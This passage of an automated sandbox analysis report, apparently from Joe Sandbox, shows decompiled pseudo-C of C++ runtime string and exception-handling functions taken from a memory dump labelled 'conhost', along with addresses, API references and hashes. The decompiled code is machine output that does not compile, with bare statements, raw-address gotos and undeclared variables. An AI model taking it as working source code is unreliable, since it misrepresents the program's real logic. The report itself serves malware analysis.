				E00007FF67FF6935F1020(_t126);
				E00007FF67FF6935CF280();
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				_t65 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
				 *0x935f4118 = 0x12400;
				malloc(_t125);
				 *0x935f4110 = _t65;
				if (_t65 == 0) goto 0x935f1ab9;
				 *0x935f4108 = _t65;
				 *_t65 = 0x12400;
				 *((long long*)(_t65 + 8)) = 0;
				goto E00007FF67FF6935C1520;
				 *0x935f4118 = 0;
				 *0x935f4108 = 0;
				goto 0x935f1aa9;
				0;
				0;
				0;
			}



















                        0x7ff6935f17d0
                        0x7ff6935f17db
                        0x7ff6935f17de
                        0x7ff6935f17f4
                        0x7ff6935f17f9
                        0x7ff6935f17ff
                        0x7ff6935f1807
                        0x7ff6935f1810
                        0x7ff6935f1812
                        0x7ff6935f1820
                        0x7ff6935f182b
                        0x7ff6935f182e
                        0x7ff6935f1844
                        0x7ff6935f1849
                        0x7ff6935f184f
                        0x7ff6935f1854
                        0x7ff6935f1857
                        0x7ff6935f1860
                        0x7ff6935f1862
                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196b
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        APIs
                          • Part of subcall function 00007FF6935F0CD0: malloc.MSVCRT(?,?,?,?,00007FF6935F16E5,?,?,?,?,00007FF6935C34A4), ref: 00007FF6935F0CE1
                          • Part of subcall function 00007FF6935CF280: RtlCaptureContext.KERNEL32 ref: 00007FF6935CF305
                          • Part of subcall function 00007FF6935CF280: RtlUnwindEx.KERNEL32 ref: 00007FF6935CF323
                          • Part of subcall function 00007FF6935CF280: abort.MSVCRT ref: 00007FF6935CF329
                        • malloc.MSVCRT ref: 00007FF6935F1A82
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$malloc$CaptureContextUnwindabort
                        • String ID:
                        • API String ID: 3412053993-0
                        • Opcode ID: 5628fa9cbb6d1ce4e6981e770d8ad87bcc2999704c8897ee67a5aff30ae11004
                        • Instruction ID: 96e071229bacb29d98e8d5eb32123c912fcabcaa0943436a3b23b33fed34f01c
                        • Opcode Fuzzy Hash: 5628fa9cbb6d1ce4e6981e770d8ad87bcc2999704c8897ee67a5aff30ae11004
                        • Instruction Fuzzy Hash: 3361A361A0A64651EA34AB17BC173BA6369FF4E7C8F4014B0EC4DAB396CE7CE144D344
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935F1610 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E00007FF67FF6935F1610() {
				long long _v584;
				void* _t81;
				void* _t83;
				void* _t84;
				int*** _t87;
				intOrPtr _t88;
				int** _t89;
				intOrPtr _t90;
				int* _t91;
				intOrPtr _t92;
				int _t93;
				long long* _t102;
				void* _t103;
				void* _t104;
				int _t119;
				int _t127;
				void* _t193;
				void* _t194;
				int _t195;
				int _t196;
				int _t197;
				int _t198;
				int _t199;
				int _t200;
				int _t201;
				int _t202;
				void* _t204;
				int _t210;
				int _t214;

				E00007FF67FF6935F0CD0(_t83, _t84, _t87, _t104);
				_t88 =  *0x935f8810; // 0x7ff6935f9370
				_t89 = _t88 + 0x10;
				 *_t87 = _t89;
				E00007FF67FF6935F1490(8, _t81, _t89, _t103, _t87, 0x935f8c90, 0x7ff6935f02e0, _t193, _t194, _t204);
				0;
				0;
				E00007FF67FF6935F0CD0(_t83, _t84, _t89, _t87);
				_t90 =  *0x935f8800; // 0x7ff6935f9340
				_t91 = _t90 + 0x10;
				 *_t89 = _t91;
				E00007FF67FF6935F1490(8, _t81, _t91, _t103, _t89, 0x935f8c70, 0x7ff6935f02a0, _t193, _t194, _t204);
				0;
				0;
				E00007FF67FF6935F0CD0(_t83, _t84, _t91, _t89);
				_t107 = _t91;
				_t92 =  *0x935f8750; // 0x7ff6935f9130
				_t93 = _t92 + 0x10;
				 *_t91 = _t93;
				E00007FF67FF6935F1490(8, _t81, _t93, _t103, _t91, 0x935f8b10, 0x7ff6935e89a0, _t193, _t194, _t204);
				0;
				0;
				_push(_t204);
				_push(_t194);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t107);
				_t195 = _t93;
				E00007FF67FF6935E89B0(_t93, _t107);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t195, 0x935f8b30, 0x7ff6935e8ae0, _t193, _t195, _t107);
				_t206 = _t93;
				E00007FF67FF6935F1020(_t195);
				E00007FF67FF6935CF280();
				_push(_t93);
				_push(_t195);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
				_t196 = _t93;
				E00007FF67FF6935E92C0(_t93, _t93);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t196, 0x935f8b70, 0x7ff6935e93e0, _t193, _t196, _t206);
				_t208 = _t93;
				E00007FF67FF6935F1020(_t196);
				E00007FF67FF6935CF280();
				_push(_t93);
				_push(_t196);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
				_t197 = _t93;
				E00007FF67FF6935E9FA0(_t93, _t93);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t197, 0x935f8c50, 0x7ff6935ea0c0, _t193, _t197, _t208);
				_t210 = _t93;
				E00007FF67FF6935F1020(_t197);
				_t119 = _t210;
				E00007FF67FF6935CF280();
				_push(_t210);
				_push(_t197);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t119);
				_t198 = _t93;
				E00007FF67FF6935E9440(_t93, _t119);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t198, 0x935f8b90, 0x7ff6935e9560, _t193, _t198, _t119);
				_t212 = _t93;
				E00007FF67FF6935F1020(_t198);
				E00007FF67FF6935CF280();
				_push(_t93);
				_push(_t198);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
				_t199 = _t93;
				E00007FF67FF6935E95C0(_t93, _t93);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t199, 0x935f8bb0, 0x7ff6935e96e0, _t193, _t199, _t212);
				_t214 = _t93;
				E00007FF67FF6935F1020(_t199);
				_t127 = _t214;
				E00007FF67FF6935CF280();
				_push(_t214);
				_push(_t199);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t127);
				_t200 = _t93;
				E00007FF67FF6935E9AD0(_t93, _t127);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t200, 0x935f8bf0, 0x7ff6935e9c00, _t193, _t200, _t127);
				_t216 = _t93;
				E00007FF67FF6935F1020(_t200);
				E00007FF67FF6935CF280();
				_push(_t93);
				_push(_t200);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
				_t201 = _t93;
				E00007FF67FF6935E8B80(_t93, _t93);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t201, 0x935f8b50, 0x7ff6935e8ca0, _t193, _t201, _t216);
				_t218 = _t93;
				E00007FF67FF6935F1020(_t201);
				E00007FF67FF6935CF280();
				_push(_t93);
				_push(_t201);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
				_t202 = _t93;
				E00007FF67FF6935E9CA0(_t93, _t93);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t202, 0x935f8c10, 0x7ff6935e9dc0, _t193, _t202, _t218);
				_t220 = _t93;
				E00007FF67FF6935F1020(_t202);
				E00007FF67FF6935CF280();
				_push(_t93);
				E00007FF67FF6935F0CD0(_t83, _t84, _t93, _t93);
				E00007FF67FF6935E9E20(_t93, _t93);
				E00007FF67FF6935F1490(0x10, _t81, _t93, _t103, _t93, 0x935f8c30, 0x7ff6935e9f40, _t193, _t93, _t220);
				E00007FF67FF6935F1020(_t93);
				E00007FF67FF6935CF280();
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				_t102 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
				 *0x935f4118 = 0x12400;
				malloc(_t202);
				 *0x935f4110 = _t102;
				if (_t102 == 0) goto 0x935f1ab9;
				 *0x935f4108 = _t102;
				 *_t102 = 0x12400;
				 *((long long*)(_t102 + 8)) = 0;
				goto E00007FF67FF6935C1520;
				 *0x935f4118 = 0;
				 *0x935f4108 = 0;
				goto 0x935f1aa9;
				0;
				0;
				0;
			}
































                        0x7ff6935f1619
                        0x7ff6935f162f
                        0x7ff6935f1636
                        0x7ff6935f163a
                        0x7ff6935f163d
                        0x7ff6935f1648
                        0x7ff6935f164c
                        0x7ff6935f1659
                        0x7ff6935f166f
                        0x7ff6935f1676
                        0x7ff6935f167a
                        0x7ff6935f167d
                        0x7ff6935f1688
                        0x7ff6935f168c
                        0x7ff6935f1699
                        0x7ff6935f16ac
                        0x7ff6935f16af
                        0x7ff6935f16b6
                        0x7ff6935f16ba
                        0x7ff6935f16bd
                        0x7ff6935f16c8
                        0x7ff6935f16cc
                        0x7ff6935f16d0
                        0x7ff6935f16d2
                        0x7ff6935f16e0
                        0x7ff6935f16eb
                        0x7ff6935f16ee
                        0x7ff6935f1704
                        0x7ff6935f1709
                        0x7ff6935f170f
                        0x7ff6935f1717
                        0x7ff6935f1720
                        0x7ff6935f1722
                        0x7ff6935f1730
                        0x7ff6935f173b
                        0x7ff6935f173e
                        0x7ff6935f1754
                        0x7ff6935f1759
                        0x7ff6935f175f
                        0x7ff6935f1767
                        0x7ff6935f1770
                        0x7ff6935f1772
                        0x7ff6935f1780
                        0x7ff6935f178b
                        0x7ff6935f178e
                        0x7ff6935f17a4
                        0x7ff6935f17a9
                        0x7ff6935f17af
                        0x7ff6935f17b4
                        0x7ff6935f17b7
                        0x7ff6935f17c0
                        0x7ff6935f17c2
                        0x7ff6935f17d0
                        0x7ff6935f17db
                        0x7ff6935f17de
                        0x7ff6935f17f4
                        0x7ff6935f17f9
                        0x7ff6935f17ff
                        0x7ff6935f1807
                        0x7ff6935f1810
                        0x7ff6935f1812
                        0x7ff6935f1820
                        0x7ff6935f182b
                        0x7ff6935f182e
                        0x7ff6935f1844
                        0x7ff6935f1849
                        0x7ff6935f184f
                        0x7ff6935f1854
                        0x7ff6935f1857
                        0x7ff6935f1860
                        0x7ff6935f1862
                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$CaptureContextUnwindabortmalloc
                        • String ID: basic_string::_M_create
                        • API String ID: 214865124-3122258987
                        • Opcode ID: 99402011d8997abeab1787329dd03b1d0581f849c5dd810c8eecc527840ca1a2
                        • Instruction ID: e3a309629d16191e03e85d8a6e0955134da54b9d9aaf44d24a38eff6a4e18daf
                        • Opcode Fuzzy Hash: 99402011d8997abeab1787329dd03b1d0581f849c5dd810c8eecc527840ca1a2
                        • Instruction Fuzzy Hash: D7413D54E0A64351ED28BB667C173BA5259FF4EBC8F8028B1EC0DFB386DD2CA105A344
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935F1860 Relevance: 1.4, APIs: 1, Instructions: 148COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E00007FF67FF6935F1860() {
				long long _v184;
				void* _t39;
				void* _t41;
				void* _t42;
				int _t44;
				long long* _t53;
				void* _t54;
				void* _t55;
				void* _t92;
				int _t93;
				int _t94;
				int _t95;

				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t55);
				_t93 = _t44;
				E00007FF67FF6935E9AD0(_t44, _t55);
				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t93, 0x935f8bf0, 0x7ff6935e9c00, _t92, _t93, _t55);
				_t98 = _t44;
				E00007FF67FF6935F1020(_t93);
				E00007FF67FF6935CF280();
				_push(_t44);
				_push(_t93);
				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t98);
				_t94 = _t44;
				E00007FF67FF6935E8B80(_t44, _t98);
				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t94, 0x935f8b50, 0x7ff6935e8ca0, _t92, _t94, _t98);
				_t100 = _t44;
				E00007FF67FF6935F1020(_t94);
				E00007FF67FF6935CF280();
				_push(_t44);
				_push(_t94);
				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t100);
				_t95 = _t44;
				E00007FF67FF6935E9CA0(_t44, _t100);
				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t95, 0x935f8c10, 0x7ff6935e9dc0, _t92, _t95, _t100);
				_t102 = _t44;
				E00007FF67FF6935F1020(_t95);
				E00007FF67FF6935CF280();
				_push(_t44);
				E00007FF67FF6935F0CD0(_t41, _t42, _t44, _t102);
				_t96 = _t44;
				E00007FF67FF6935E9E20(_t44, _t102);
				E00007FF67FF6935F1490(0x10, _t39, _t44, _t54, _t44, 0x935f8c30, 0x7ff6935e9f40, _t92, _t44, _t102);
				E00007FF67FF6935F1020(_t96);
				E00007FF67FF6935CF280();
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				_t53 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
				 *0x935f4118 = 0x12400;
				malloc(_t95);
				 *0x935f4110 = _t53;
				if (_t53 == 0) goto 0x935f1ab9;
				 *0x935f4108 = _t53;
				 *_t53 = 0x12400;
				 *((long long*)(_t53 + 8)) = 0;
				goto E00007FF67FF6935C1520;
				 *0x935f4118 = 0;
				 *0x935f4108 = 0;
				goto 0x935f1aa9;
				0;
				0;
				0;
			}















                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196b
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        APIs
                          • Part of subcall function 00007FF6935F0CD0: malloc.MSVCRT(?,?,?,?,00007FF6935F16E5,?,?,?,?,00007FF6935C34A4), ref: 00007FF6935F0CE1
                          • Part of subcall function 00007FF6935CF280: RtlCaptureContext.KERNEL32 ref: 00007FF6935CF305
                          • Part of subcall function 00007FF6935CF280: RtlUnwindEx.KERNEL32 ref: 00007FF6935CF323
                          • Part of subcall function 00007FF6935CF280: abort.MSVCRT ref: 00007FF6935CF329
                        • malloc.MSVCRT ref: 00007FF6935F1A82
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$malloc$CaptureContextUnwindabort
                        • String ID:
                        • API String ID: 3412053993-0
                        • Opcode ID: ca3d01152eea4bb4fb6ef27bcb079ca9f80667923325b74fd32d3c8c0e57c1fc
                        • Instruction ID: f3d11a4e2ecc5aad80574d9ece5ab96f1d88db201d95b7c3f1a65e6cc28acc8f
                        • Opcode Fuzzy Hash: ca3d01152eea4bb4fb6ef27bcb079ca9f80667923325b74fd32d3c8c0e57c1fc
                        • Instruction Fuzzy Hash: 51519261A0974681EA34AB16FC573B663A8FB4D7C8F4014B0D98DAB396CF7DE1449384
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935F16D0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E00007FF67FF6935F16D0() {
				long long _v464;
				void* _t69;
				void* _t71;
				void* _t72;
				int _t74;
				long long* _t83;
				void* _t84;
				void* _t85;
				int _t97;
				int _t105;
				void* _t162;
				int _t163;
				int _t164;
				int _t165;
				int _t166;
				int _t167;
				int _t168;
				int _t169;
				int _t170;
				int _t177;
				int _t181;

				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t85);
				_t163 = _t74;
				E00007FF67FF6935E89B0(_t74, _t85);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t163, 0x935f8b30, 0x7ff6935e8ae0, _t162, _t163, _t85);
				_t173 = _t74;
				E00007FF67FF6935F1020(_t163);
				E00007FF67FF6935CF280();
				_push(_t74);
				_push(_t163);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
				_t164 = _t74;
				E00007FF67FF6935E92C0(_t74, _t74);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t164, 0x935f8b70, 0x7ff6935e93e0, _t162, _t164, _t173);
				_t175 = _t74;
				E00007FF67FF6935F1020(_t164);
				E00007FF67FF6935CF280();
				_push(_t74);
				_push(_t164);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
				_t165 = _t74;
				E00007FF67FF6935E9FA0(_t74, _t74);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t165, 0x935f8c50, 0x7ff6935ea0c0, _t162, _t165, _t175);
				_t177 = _t74;
				E00007FF67FF6935F1020(_t165);
				_t97 = _t177;
				E00007FF67FF6935CF280();
				_push(_t177);
				_push(_t165);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t97);
				_t166 = _t74;
				E00007FF67FF6935E9440(_t74, _t97);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t166, 0x935f8b90, 0x7ff6935e9560, _t162, _t166, _t97);
				_t179 = _t74;
				E00007FF67FF6935F1020(_t166);
				E00007FF67FF6935CF280();
				_push(_t74);
				_push(_t166);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
				_t167 = _t74;
				E00007FF67FF6935E95C0(_t74, _t74);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t167, 0x935f8bb0, 0x7ff6935e96e0, _t162, _t167, _t179);
				_t181 = _t74;
				E00007FF67FF6935F1020(_t167);
				_t105 = _t181;
				E00007FF67FF6935CF280();
				_push(_t181);
				_push(_t167);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t105);
				_t168 = _t74;
				E00007FF67FF6935E9AD0(_t74, _t105);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t168, 0x935f8bf0, 0x7ff6935e9c00, _t162, _t168, _t105);
				_t183 = _t74;
				E00007FF67FF6935F1020(_t168);
				E00007FF67FF6935CF280();
				_push(_t74);
				_push(_t168);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
				_t169 = _t74;
				E00007FF67FF6935E8B80(_t74, _t74);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t169, 0x935f8b50, 0x7ff6935e8ca0, _t162, _t169, _t183);
				_t185 = _t74;
				E00007FF67FF6935F1020(_t169);
				E00007FF67FF6935CF280();
				_push(_t74);
				_push(_t169);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
				_t170 = _t74;
				E00007FF67FF6935E9CA0(_t74, _t74);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t170, 0x935f8c10, 0x7ff6935e9dc0, _t162, _t170, _t185);
				_t187 = _t74;
				E00007FF67FF6935F1020(_t170);
				E00007FF67FF6935CF280();
				_push(_t74);
				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
				E00007FF67FF6935E9E20(_t74, _t74);
				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t74, 0x935f8c30, 0x7ff6935e9f40, _t162, _t74, _t187);
				E00007FF67FF6935F1020(_t74);
				E00007FF67FF6935CF280();
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				_t83 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
				 *0x935f4118 = 0x12400;
				malloc(_t170);
				 *0x935f4110 = _t83;
				if (_t83 == 0) goto 0x935f1ab9;
				 *0x935f4108 = _t83;
				 *_t83 = 0x12400;
				 *((long long*)(_t83 + 8)) = 0;
				goto E00007FF67FF6935C1520;
				 *0x935f4118 = 0;
				 *0x935f4108 = 0;
				goto 0x935f1aa9;
				0;
				0;
				0;
			}
























                        0x7ff6935f16e0
                        0x7ff6935f16eb
                        0x7ff6935f16ee
                        0x7ff6935f1704
                        0x7ff6935f1709
                        0x7ff6935f170f
                        0x7ff6935f1717
                        0x7ff6935f1720
                        0x7ff6935f1722
                        0x7ff6935f1730
                        0x7ff6935f173b
                        0x7ff6935f173e
                        0x7ff6935f1754
                        0x7ff6935f1759
                        0x7ff6935f175f
                        0x7ff6935f1767
                        0x7ff6935f1770
                        0x7ff6935f1772
                        0x7ff6935f1780
                        0x7ff6935f178b
                        0x7ff6935f178e
                        0x7ff6935f17a4
                        0x7ff6935f17a9
                        0x7ff6935f17af
